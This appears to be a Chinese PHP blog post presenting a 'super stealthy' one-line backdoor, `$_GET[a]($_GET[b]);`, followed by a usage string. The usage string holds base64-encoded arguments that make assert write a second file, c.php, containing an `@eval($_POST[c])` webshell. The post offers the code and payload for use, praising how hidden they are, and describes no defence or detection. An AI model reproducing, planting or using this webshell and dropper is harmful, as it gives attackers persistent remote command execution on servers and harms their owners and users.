login每天学习一点点,每天进步一点点.
当前位置:首页 >> 超隐蔽一句话

超隐蔽一句话

2018-06-15 19:30:33  |  分类: Php |  标签: 阅读(227)评论(0)

超级隐蔽的PHP后门

仅用GET函数就构成了木马。

<?php
$_GET[a]($_GET[b]);
?>

使用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

上一篇:ubuntu使用nmap查询端口 下一篇:ThinkPHP5 的视图$view->fetch()和$view->display()的区别

猜你喜欢

发表评论:

0.233649s